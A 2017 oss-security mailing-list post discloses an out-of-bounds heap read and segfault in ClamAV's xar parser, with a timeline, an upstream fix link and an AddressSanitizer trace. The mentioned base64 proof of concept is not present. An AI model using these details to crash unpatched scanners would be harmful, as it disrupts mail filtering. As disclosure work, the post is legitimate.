Date: Fri, 29 Sep 2017 15:09:22 +0200
From: Hanno Böck <hanno@...eck.de>
To: oss-security@...ts.openwall.com
Subject: clamav: Out of bounds read and segfault in xar parser

Hi,

A malformed xar file can cause an out of bounds heap read in clamav (as
usual detectable with asan). If run against a non-asan build clamscan
will still segfault in my tests. Found with afl.

The bug happens in the function xar_hash_check. Despite it being
reported more than a year ago there's still no release with the fix
(however it's been fixed in git).

I fuzzed clamav according to the instructions in this blog post:
https://foxglovesecurity.com/2016/06/13/finding-pearls-fuzzing-clamav/

Upstream fix:
https://github.com/vrtadmin/clamav-devel/commit/d96a6b8bcc7439fa7e3876207aa0a8e79c8451b6

Upstream bug (not public):
https://bugzilla.clamav.net/show_bug.cgi?id=11588

Timeline:
2016-06-15 reported bug
2016-06-21 fix in git
2017-09-29 public disclosure due to lack of upstream action

base64-encoded poc (didn't want to send it as an attachment due to
fear of crashing people's mail scanners. On the other hand I'm sure
there are mail scanners that'll try to decode the base64...):


Meta-level comment:
It seems to me clamav development has mostly stalled. Detection rates
are very low and I'm considering no longer using it for mail filtering.
(also there's of course the whole AV debate, however I never saw
clamav as a security tool, more as something like a spam filter that
prevents crap in my inbox. Still of course it needs to have secure
parsers.)



ASAN error:

==17489==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000504790 at pc 0x7f83622125d4 bp 0x7ffcee86b840 sp 0x7ffcee86b830
READ of size 20 at 0x602000504790 thread T0
    #0 0x7f83622125d3 in xar_hash_check /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/xar.c:399
    #1 0x7f83622125d3 in cli_scanxar /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/xar.c:818
    #2 0x7f8362053706 in magic_scandesc /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3162
    #3 0x7f8362057376 in cli_base_scandesc /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3351
    #4 0x7f8362058a65 in scan_common /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3590
    #5 0x7f8362058d1a in scan_common /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3534
    #6 0x7f8362058d1a in cl_scandesc_callback /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/libclamav/scanners.c:3706
    #7 0x40e41f in scanfile /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/clamscan/manager.c:392
    #8 0x4126a3 in scanmanager /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/clamscan/manager.c:1204
    #9 0x403971 in main /var/tmp/portage/app-antivirus/clamav-0.99.2/work/clamav-0.99.2/clamscan/clamscan.c:161
    #10 0x7f83616f478f in __libc_start_main (/lib64/libc.so.6+0x2078f)
    #11 0x403fb8 in _start (/usr/bin/clamscan+0x403fb8)

-- 
Hanno Böck
https://hboeck.de/

mail/jabber: hanno@...eck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42
